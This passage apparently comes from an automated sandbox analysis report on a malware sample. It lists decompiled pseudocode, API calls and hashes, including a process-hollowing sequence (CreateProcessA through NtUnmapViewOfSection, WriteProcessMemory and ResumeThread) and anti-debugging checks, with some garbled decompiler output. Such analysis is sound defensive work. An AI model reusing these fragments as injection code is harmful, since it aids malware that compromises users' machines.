              				 *(__ecx + _t44 * 8 - 0x4ce15fe7) =  *(__ecx + _t44 * 8 - 0x4ce15fe7) | __edi;
              				asm("sbb esi, [ebx-0x204c57c7]");
              				asm("invalid");
              				asm("iretd");
              				 *(_t44 - 0x38a2c7b4) =  *(_t44 - 0x38a2c7b4) ^ _t70;
              				 *(__ecx + 0x1f1c5c0c +  *0xc75d384c * 8) =  *(__ecx + 0x1f1c5c0c +  *0xc75d384c * 8) | __edi;
              				asm("movsb");
              				_pop(_t72);
              				asm("invalid");
              				asm("es movsd");
              				asm("cmpsd");
              				asm("adc dh, bh");
              				asm("pushad");
              				asm("frstor [ebx+ebx*2]");
              				asm("outsb");
              				asm("adc al, 0xa7");
              				asm("sbb ebx, [edx]");
              				asm("cmpsd");
              				asm("in al, dx");
              				 *0xFFFFFFFFA45EA814 = 0xa74888cf;
              				asm("cmpsb");
              				asm("int3");
              				asm("cmpsd");
              				 *0xa0d5a4bf = 0x84;
              				return  *((intOrPtr*)(_t72 - 4));
              			}










              0x004023d9
              0x004023d9
              0x004023de
              0x004023e4
              0x004023eb
              0x004023ec
              0x004023ed
              0x004023f5
              0x004023f7
              0x00402401
              0x00402402
              0x00402403
              0x00402408
              0x0040240e
              0x00402411
              0x00402411
              0x00402414
              0x00402422
              0x0040242d
              0x00402430
              0x00402431
              0x00402437
              0x0040243e
              0x00402443
              0x00402444
              0x00402464
              0x00402473
              0x00402475
              0x00402477
              0x00402478
              0x0040247b
              0x0040247e
              0x00402481
              0x00402483
              0x0040248a
              0x00402490
              0x00402498
              0x00402499
              0x0040249a
              0x0040249b
              0x004024a9

              Memory Dump Source
              • Source File: 00000001.00000002.765609356.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6ee4aad523619d2523866d80873a575c389a27590689aa6c2f41782ac6c4a352
              • Instruction ID: df714e191690ec59b59deb9f1aa5729172ce7cf2683613fe6c18e08e4d69e8fc
              • Opcode Fuzzy Hash: 6ee4aad523619d2523866d80873a575c389a27590689aa6c2f41782ac6c4a352
              • Instruction Fuzzy Hash: 90D0A732E05A51DFC7059F20FC430887BB5EA40B00701838AC8E1568B1C73561A2CFC6
              Uniqueness

              Uniqueness Score: -1.00%

              Executed Functions

              APIs
              • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 01D20156
              • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 01D2016C
              • CreateProcessA.KERNELBASE(?,00000000), ref: 01D20255
              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 01D20270
              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 01D20283
              • GetThreadContext.KERNELBASE(00000000,?), ref: 01D2029F
              • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 01D202C8
              • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 01D202E3
              • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 01D20304
              • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 01D2032A
              • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 01D20399
              • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 01D203BF
              • SetThreadContext.KERNELBASE(00000000,?), ref: 01D203E1
              • ResumeThread.KERNELBASE(00000000), ref: 01D203ED
              • ExitProcess.KERNEL32(00000000), ref: 01D20412
              Memory Dump Source
              • Source File: 00000004.00000002.820682255.0000000001D20000.00000040.00000001.sdmp, Offset: 01D20000, based on PE: false
              Similarity
              • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
              • String ID:
              • API String ID: 2875986403-0
              • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
              • Instruction ID: 3fe0124d9a1a6742bd082d81542a47e134f55fdd4879c2b0c20961289796e2b2
              • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
              • Instruction Fuzzy Hash: 82B1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E549AB391D771AE41CF94
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 01D20533
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.820682255.0000000001D20000.00000040.00000001.sdmp, Offset: 01D20000, based on PE: false
              Similarity
              • API ID: CreateWindow
              • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
              • API String ID: 716092398-2341455598
              • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
              • Instruction ID: eee8c0879424a9044b812e30220668e2de2e10547ec9e59fffd905a6911b075e
              • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
              • Instruction Fuzzy Hash: 6A511B70D08388DAEB11CBD8C849BDDBFB2AF25708F144098E5447F2C6C3BA5559CB65
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetFileAttributesA.KERNELBASE(apfHQ), ref: 01D205EC
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.820682255.0000000001D20000.00000040.00000001.sdmp, Offset: 01D20000, based on PE: false
              Similarity
              • API ID: AttributesFile
              • String ID: apfHQ$o
              • API String ID: 3188754299-2999369273
              • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
              • Instruction ID: 6c6a95da3c2360f999bde34dec48a35e4ae6ce6d43808e87d1fd6068a8ed770f
              • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
              • Instruction Fuzzy Hash: ED015E70C0425CEFDF10DB98C4583AEBFB5AF51309F148099D4192B341D7B69B58CBA2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • Module32First.KERNEL32(00000000,00000224), ref: 01F1DE15
              Memory Dump Source
              • Source File: 00000004.00000002.820832478.0000000001F19000.00000040.00000001.sdmp, Offset: 01F19000, based on PE: false
              Similarity
              • API ID: FirstModule32
              • String ID:
              • API String ID: 3757679902-0
              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
              • Instruction ID: d7e6d39645839e8ee6bf0f87ed098ba5dbfe39951266091621a8973b6b286a6c
              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
              • Instruction Fuzzy Hash: 88F09632600711ABE7203BFDAC8DB6F76F8EF49625F140668E642914C4DB72E8458B61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RtlEncodePointer.NTDLL(00000000,?,0041854B,?,?,0041B870), ref: 0041B707
              Memory Dump Source
              • Source File: 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.820415652.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.820493693.0000000000432000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.820642346.0000000001BE7000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: EncodePointer
              • String ID:
              • API String ID: 2118026453-0
              • Opcode ID: 9959ae12a63e7be41ee1249dc23bfeec2a60edfea2c01f2fa9bd04385b4242a5
              • Instruction ID: fff4fc13f331173d5f44345ba5de76c3d217d84afd66244667499e79857a9d4f
              • Opcode Fuzzy Hash: 9959ae12a63e7be41ee1249dc23bfeec2a60edfea2c01f2fa9bd04385b4242a5
              • Instruction Fuzzy Hash: 7EA0223208830CB3E20023C3BE0EF8A3F0CC3C0B32F000030FA0C028A00EB2B80080AA
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			_entry_() {
              				void* _t3;
              
              				E00417F30(); // executed
              				return L00417C40(_t3);
              			}




              0x00417c25
              0x00417c30

              APIs
              • ___security_init_cookie.LIBCMTD ref: 00417C25
              Memory Dump Source
              • Source File: 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.820415652.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.820493693.0000000000432000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.820642346.0000000001BE7000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ___security_init_cookie
              • String ID:
              • API String ID: 3657697845-0
              • Opcode ID: 171c28b58462050255cb6f92a214f913f529165168e82ffd83e58af334052e97
              • Instruction ID: 75362f7300f174ec655b47ac61f3a362e1bc62a5ad9bc88d6b2dcc2f719078ed
              • Opcode Fuzzy Hash: 171c28b58462050255cb6f92a214f913f529165168e82ffd83e58af334052e97
              • Instruction Fuzzy Hash: DBA002310AC64816015433A7450798B756E4BC0718795105BB5590210B2C5CA8C280EE
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 01F1DADD
              Memory Dump Source
              • Source File: 00000004.00000002.820832478.0000000001F19000.00000040.00000001.sdmp, Offset: 01F19000, based on PE: false
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
              • Instruction ID: b19973d3e4ad382eab766410a0173996800e7c019aed0b5dc67676232c7268c8
              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
              • Instruction Fuzzy Hash: A7113C79A00208EFDB01DF98C989E98BFF5AF08351F098094F9489B361D371EA50DF90
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              C-Code - Quality: 85%
              			E0041FDD0(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
              				intOrPtr _v0;
              				void* _v804;
              				intOrPtr _v808;
              				intOrPtr _v812;
              				intOrPtr _t6;
              				intOrPtr _t11;
              				long _t15;
              				intOrPtr _t19;
              				intOrPtr _t20;
              				intOrPtr _t21;
              				intOrPtr _t22;
              				intOrPtr _t23;
              				intOrPtr _t24;
              				intOrPtr _t25;
              				intOrPtr* _t29;
              				void* _t34;
              
              				_t25 = __esi;
              				_t24 = __edi;
              				_t22 = __edx;
              				_t20 = __ecx;
              				_t19 = __ebx;
              				_t6 = __eax;
              				_t34 = _t20 -  *0x432064; // 0xb758e270
              				if(_t34 == 0) {
              					asm("repe ret");
              				}
              				 *0x433b68 = _t6;
              				 *0x433b64 = _t20;
              				 *0x433b60 = _t22;
              				 *0x433b5c = _t19;
              				 *0x433b58 = _t25;
              				 *0x433b54 = _t24;
              				 *0x433b80 = ss;
              				 *0x433b74 = cs;
              				 *0x433b50 = ds;
              				 *0x433b4c = es;
              				 *0x433b48 = fs;
              				 *0x433b44 = gs;
              				asm("pushfd");
              				_pop( *0x433b78);
              				 *0x433b6c =  *_t29;
              				 *0x433b70 = _v0;
              				 *0x433b7c =  &_a4;
              				 *0x433ab8 = 0x10001;
              				_t11 =  *0x433b70; // 0x0
              				 *0x433a6c = _t11;
              				 *0x433a60 = 0xc0000409;
              				 *0x433a64 = 1;
              				_t21 =  *0x432064; // 0xb758e270
              				_v812 = _t21;
              				_t23 =  *0x432068; // 0x48a71d8f
              				_v808 = _t23;
              				 *0x433ab0 = IsDebuggerPresent();
              				_push(1);
              				E0041F220(_t12);
              				SetUnhandledExceptionFilter(0);
              				_t15 = UnhandledExceptionFilter("`:C");
              				if( *0x433ab0 == 0) {
              					_push(1);
              					E0041F220(_t15);
              				}
              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
              			}



















              0x0041fdd0
              0x0041fdd0
              0x0041fdd0
              0x0041fdd0
              0x0041fdd0
              0x0041fdd0
              0x0041fdd0
              0x0041fdd6
              0x0041fdd8
              0x0041fdd8
              0x0042449b
              0x004244a0
              0x004244a6
              0x004244ac
              0x004244b2
              0x004244b8
              0x004244be
              0x004244c5
              0x004244cc
              0x004244d3
              0x004244da
              0x004244e1
              0x004244e8
              0x004244e9
              0x004244f2
              0x004244fa
              0x00424502
              0x0042450d
              0x00424517
              0x0042451c
              0x00424521
              0x0042452b
              0x00424535
              0x0042453b
              0x00424541
              0x00424547
              0x00424553
              0x00424558
              0x0042455a
              0x00424564
              0x0042456f
              0x0042457c
              0x0042457e
              0x00424580
              0x00424585
              0x0042459d

              APIs
              • IsDebuggerPresent.KERNEL32 ref: 0042454D
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00424564
              • UnhandledExceptionFilter.KERNEL32(`:C), ref: 0042456F
              • GetCurrentProcess.KERNEL32(C0000409), ref: 0042458D
              • TerminateProcess.KERNEL32(00000000), ref: 00424594
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.820415652.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.820493693.0000000000432000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.820642346.0000000001BE7000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
              • String ID: `:C
              • API String ID: 2579439406-2112543841
              • Opcode ID: 5f07c0ba91c4a311d966236a698771f1edd427859634f51a4b477b8fe04c93ae
              • Instruction ID: df30baf3a4553619d861d5c5530e1938f48ef394fcdc49e22dd6aa407c5cc3c4
              • Opcode Fuzzy Hash: 5f07c0ba91c4a311d966236a698771f1edd427859634f51a4b477b8fe04c93ae
              • Instruction Fuzzy Hash: 0921C0B8904304EBE714EF69F944644BBA4FB08316F10217AEA0993772E7796689CF4D
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000004.00000002.820832478.0000000001F19000.00000040.00000001.sdmp, Offset: 01F19000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
              • Instruction ID: 0d2ac3d19d4c792fcd7c5100d917c2e1d0d76f473c35f79ea6405b3bb2770ec0
              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
              • Instruction Fuzzy Hash: 1411A5733401019FD744DF99DCD4FA673EAEB89360B198065ED08CB319D676E802C760
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000004.00000002.820682255.0000000001D20000.00000040.00000001.sdmp, Offset: 01D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
              • Instruction ID: ea11536aa9e207517ac4e09317ff52d21c6b9bacb836c8ea27d39ac4b5709d32
              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
              • Instruction Fuzzy Hash: 1B11CE72340120AFEB14CF69DCD0FA273EAFB98224B198065ED18CB311D67AE801C760
              Uniqueness

              Uniqueness Score: -1.00%

              Executed Functions

              C-Code - Quality: 100%
              			E00401812(void* __edx) {
              				void* _t4;
              
              				 *((intOrPtr*)(_t4 - 0x77)) =  *((intOrPtr*)(_t4 - 0x77)) + __edx;
              			}




              0x00401812

              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000005.00000002.833159918.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: a9242262985629b7ba65b23d5e149a247a5822ccc711938d973886dc562d5c51
              • Instruction ID: 66c4bf53945efb9eac17a29b63d6e60a7dc9cc17017cfcbb6067bf93f0ee6b10
              • Opcode Fuzzy Hash: a9242262985629b7ba65b23d5e149a247a5822ccc711938d973886dc562d5c51
              • Instruction Fuzzy Hash: EC011277548205EBEB007AA59C41AAA37289B05754F34C537FA12B80F1D67D8713A71F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 70%
              			E00401813(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
              				char _v8;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr _t8;
              				void* _t11;
              				void* _t13;
              				void* _t16;
              				intOrPtr* _t17;
              				void* _t19;
              				void* _t20;
              				void* _t21;
              				void* _t22;
              				intOrPtr* _t23;
              
              				_t25 = __eflags;
              				_push(0x184c);
              				_t8 =  *_t23;
              				L0040113B(_t8, _t16, 0x5c, _t21, _t22, __eflags);
              				_t17 = _a4;
              				Sleep(0x1388);
              				_t11 = L0040138D(_t20, _t25, _t17, _a8, _a12,  &_v8); // executed
              				_t26 = _t11;
              				if(_t11 != 0) {
              					L00401460(_t17, _t20, _t21, _t22, _t26, _t17, _t11, _v8, _a16); // executed
              				}
              				 *_t17(0xffffffff, 0); // executed
              				_t13 = 0x184c;
              				_t19 = 0x5c;
              				return L0040113B(_t13, _t17, _t19, _t21, _t22, _t26);
              			}

















              0x00401813
              0x00401822
              0x00401827
              0x00401847
              0x0040184c
              0x00401854
              0x00401862
              0x00401867
              0x00401869
              0x00401873
              0x00401873
              0x0040187c
              0x0040188b
              0x0040189b
              0x004018ac

              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000005.00000002.833159918.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: 89745b0bfaaf1c7b55dfe8fa037d4d7c0223a41cfa17f4c26d190fbbe19b2ead
              • Instruction ID: 7d9be0058e33673f170ed7bdf9e45501506609fca6745517c781ff617e647718
              • Opcode Fuzzy Hash: 89745b0bfaaf1c7b55dfe8fa037d4d7c0223a41cfa17f4c26d190fbbe19b2ead
              • Instruction Fuzzy Hash: 9A014F77608205FBEB007AA59C41EBA362C9B04754F24C437BA03B80F1DA7C9712A76F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 65%
              			E00401830(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
              				intOrPtr _t8;
              				void* _t11;
              				void* _t13;
              				intOrPtr* _t17;
              				void* _t20;
              				void* _t26;
              				intOrPtr* _t28;
              
              				_t31 = __eflags;
              				_t24 = __esi;
              				_t22 = __edi;
              				_t21 = __edx;
              				_push(__edx);
              				_push(0x184c);
              				_t8 =  *_t28;
              				L0040113B(_t8, __ebx, 0x5c, __edi, __esi, __eflags);
              				_t17 =  *((intOrPtr*)(_t26 + 8));
              				Sleep(0x1388);
              				_t11 = L0040138D(_t21, _t31, _t17,  *((intOrPtr*)(_t26 + 0xc)),  *((intOrPtr*)(_t26 + 0x10)), _t26 - 4); // executed
              				_t32 = _t11;
              				if(_t11 != 0) {
              					L00401460(_t17, _t21, _t22, __esi, _t32, _t17, _t11,  *((intOrPtr*)(_t26 - 4)),  *((intOrPtr*)(_t26 + 0x14))); // executed
              				}
              				 *_t17(0xffffffff, 0); // executed
              				_t13 = 0x184c;
              				_t20 = 0x5c;
              				return L0040113B(_t13, _t17, _t20, _t22, _t24, _t32);
              			}










              0x00401830
              0x00401830
              0x00401830
              0x00401830
              0x00401830
              0x00401822
              0x00401827
              0x00401847
              0x0040184c
              0x00401854
              0x00401862
              0x00401867
              0x00401869
              0x00401873
              0x00401873
              0x0040187c
              0x0040188b
              0x0040189b
              0x004018ac

              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000005.00000002.833159918.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: f0b3e7d236e0b2aebba72a48561d88988893c2cfd0a9863272573b7202c77ad1
              • Instruction ID: deb966eb77b9a567301be81d0aa6add722e5d663e7a56bf983217a5254dc7aad
              • Opcode Fuzzy Hash: f0b3e7d236e0b2aebba72a48561d88988893c2cfd0a9863272573b7202c77ad1
              • Instruction Fuzzy Hash: D9F0E677608205EBEB007A959C41EBA36289B04755F34C437BA13B90F1DA7D9712A72F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 79%
              			E00401833(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				void* __ecx;
              				void* _t8;
              				void* _t11;
              				void* _t13;
              				intOrPtr* _t17;
              				void* _t21;
              				void* _t22;
              				void* _t27;
              
              				_t30 = __eflags;
              				_t25 = __esi;
              				_t23 = __edi;
              				L0040113B(_t8, __ebx, 0x5c, __edi, __esi, __eflags);
              				_t17 =  *((intOrPtr*)(_t27 + 8));
              				Sleep(0x1388);
              				_t11 = L0040138D(_t22, _t30, _t17,  *((intOrPtr*)(_t27 + 0xc)),  *((intOrPtr*)(_t27 + 0x10)), _t27 - 4); // executed
              				_t31 = _t11;
              				if(_t11 != 0) {
              					L00401460(_t17, _t22, _t23, __esi, _t31, _t17, _t11,  *((intOrPtr*)(_t27 - 4)),  *((intOrPtr*)(_t27 + 0x14))); // executed
              				}
              				 *_t17(0xffffffff, 0); // executed
              				_t13 = 0x184c;
              				_t21 = 0x5c;
              				return L0040113B(_t13, _t17, _t21, _t23, _t25, _t31);
              			}











              0x00401833
              0x00401833
              0x00401833
              0x00401847
              0x0040184c
              0x00401854
              0x00401862
              0x00401867
              0x00401869
              0x00401873
              0x00401873
              0x0040187c
              0x0040188b
              0x0040189b
              0x004018ac

              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000005.00000002.833159918.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: 3be197aa96b37fb01e35ccc665f06a57c5b22eeab7c7f1fa4e7c4c0b74a31191
              • Instruction ID: 618970b1dbb32a4db62a2ca4bba0e2ab9b1e6011c78eec4eed3c6938ee6c48e5
              • Opcode Fuzzy Hash: 3be197aa96b37fb01e35ccc665f06a57c5b22eeab7c7f1fa4e7c4c0b74a31191
              • Instruction Fuzzy Hash: DFF01277604205FBEB047AE19C41EBA36289B04755F24C537BA13B80F1DA3C8712A72F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 63%
              			E00401836(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				void* _t8;
              				void* _t11;
              				void* _t13;
              				intOrPtr* _t17;
              				void* _t20;
              				void* _t21;
              				void* _t23;
              				void* _t27;
              
              				_t30 = __eflags;
              				_t25 = __esi;
              				_t23 = __edi - 1;
              				asm("invalid");
              				asm("int 0x8e");
              				L0040113B(_t8, __ebx, 0x5c, _t23, __esi, __eflags);
              				_t17 =  *((intOrPtr*)(_t27 + 8));
              				Sleep(0x1388);
              				_t11 = L0040138D(_t21, _t30, _t17,  *((intOrPtr*)(_t27 + 0xc)),  *((intOrPtr*)(_t27 + 0x10)), _t27 - 4); // executed
              				_t31 = _t11;
              				if(_t11 != 0) {
              					L00401460(_t17, _t21, _t23, __esi, _t31, _t17, _t11,  *((intOrPtr*)(_t27 - 4)),  *((intOrPtr*)(_t27 + 0x14))); // executed
              				}
              				 *_t17(0xffffffff, 0); // executed
              				_t13 = 0x184c;
              				_t20 = 0x5c;
              				return L0040113B(_t13, _t17, _t20, _t23, _t25, _t31);
              			}











              0x00401836
              0x00401836
              0x00401836
              0x00401837
              0x00401839
              0x00401847
              0x0040184c
              0x00401854
              0x00401862
              0x00401867
              0x00401869
              0x00401873
              0x00401873
              0x0040187c
              0x0040188b
              0x0040189b
              0x004018ac

              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000005.00000002.833159918.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: 6270efecb34b7a24ecfb20c25f7994d7e548ab66cc763392a0d1480e5281e59a
              • Instruction ID: a9217997abf11aa28aa6879baaed046148431452325da12b2764b37c26675c88
              • Opcode Fuzzy Hash: 6270efecb34b7a24ecfb20c25f7994d7e548ab66cc763392a0d1480e5281e59a
              • Instruction Fuzzy Hash: 17F0FF77604205FBEB01AAA19C41A6A36289F05355F248477BA12B90F1DA389652A72B
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 79%
              			E00401842(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				void* __ecx;
              				void* _t8;
              				void* _t11;
              				void* _t13;
              				intOrPtr* _t17;
              				void* _t21;
              				void* _t27;
              
              				_t30 = __eflags;
              				_t25 = __esi;
              				_t23 = __edi;
              				L0040113B(_t8, __ebx, 0x5c, __edi, __esi, __eflags);
              				_t17 =  *((intOrPtr*)(_t27 + 8));
              				Sleep(0x1388);
              				_t11 = L0040138D(0xeb, _t30, _t17,  *((intOrPtr*)(_t27 + 0xc)),  *((intOrPtr*)(_t27 + 0x10)), _t27 - 4); // executed
              				_t31 = _t11;
              				if(_t11 != 0) {
              					L00401460(_t17, 0xeb, _t23, __esi, _t31, _t17, _t11,  *((intOrPtr*)(_t27 - 4)),  *((intOrPtr*)(_t27 + 0x14))); // executed
              				}
              				 *_t17(0xffffffff, 0); // executed
              				_t13 = 0x184c;
              				_t21 = 0x5c;
              				return L0040113B(_t13, _t17, _t21, _t23, _t25, _t31);
              			}










              0x00401842
              0x00401842
              0x00401842
              0x00401847
              0x0040184c
              0x00401854
              0x00401862
              0x00401867
              0x00401869
              0x00401873
              0x00401873
              0x0040187c
              0x0040188b
              0x0040189b
              0x004018ac

              APIs
              • Sleep.KERNELBASE(00001388), ref: 00401854
              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040187C
              Memory Dump Source
              • Source File: 00000005.00000002.833159918.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: ProcessSleepTerminate
              • String ID:
              • API String ID: 417527130-0
              • Opcode ID: b4b0a9984882ff5f2b6faabf12f6e8ec5eae452e92f205c2972abf1b7a202191
              • Instruction ID: 04e1208274e68be980b74980f77298c45205cb64358d3d7bc66da16523479b8c
              • Opcode Fuzzy Hash: b4b0a9984882ff5f2b6faabf12f6e8ec5eae452e92f205c2972abf1b7a202191
              • Instruction Fuzzy Hash: E5F03677604205FAEF007FE19C41EAA3728DF08759F248537BA12B80F1D5388612A72E
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Executed Functions

              C-Code - Quality: 76%
              			E00402679(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
              				struct _OBJDIR_INFORMATION _v8;
              				char _v16;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				long _t12;
              				intOrPtr _t13;
              				struct _OBJDIR_INFORMATION _t15;
              				void* _t16;
              				void* _t20;
              				void* _t22;
              				UNICODE_STRING* _t23;
              				intOrPtr* _t24;
              
              				asm("cmc");
              				L0040113B(0x26ab, _t16, 0x54, _t20, _t22, __eflags);
              				_t17 = _a4;
              				_t23 =  &_v16;
              				 *((intOrPtr*)(_a4 + 0xc))(_t23, _a8);
              				_t21 =  &_v8;
              				_t12 = LdrLoadDll(0, 0, _t23,  &_v8);
              				_t27 = _t12;
              				if(_t12 != 0) {
              					_v8 = 0;
              				}
              				_push(0x26ab);
              				_t13 =  *_t24;
              				L0040113B(_t13, _t17, 0x54, _t21, _t23, _t27);
              				_t15 = _v8;
              				asm("cld");
              				return _t15;
              			}
















              0x004026a4
              0x004026a6
              0x004026ab
              0x004026ae
              0x004026b5
              0x004026b8
              0x004026c1
              0x004026c4
              0x004026c6
              0x004026c8
              0x004026c8
              0x004026d6
              0x004026db
              0x004026fa
              0x004026ff
              0x00402701
              0x00402706

              APIs
              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004026C1
              Memory Dump Source
              • Source File: 00000006.00000001.820130160.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: 90caf3a2791a19ed9d756e485383a78dd0304a068a2d0dde794b5c3212d9556e
              • Instruction ID: 9392b1017120e72836d2f08bfb07165e30ffb9dd7dda72a47689019b9fa0b3fd
              • Opcode Fuzzy Hash: 90caf3a2791a19ed9d756e485383a78dd0304a068a2d0dde794b5c3212d9556e
              • Instruction Fuzzy Hash: 94018631608104E7DB00AA85CF4DBAE7728AB44308F204837A6077A1C0D5FF591BBB6F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 80%
              			E004026A1(void* __eax, void* __ebx, void* __edi, void* __esi) {
              				long _t13;
              				intOrPtr _t14;
              				struct _OBJDIR_INFORMATION _t16;
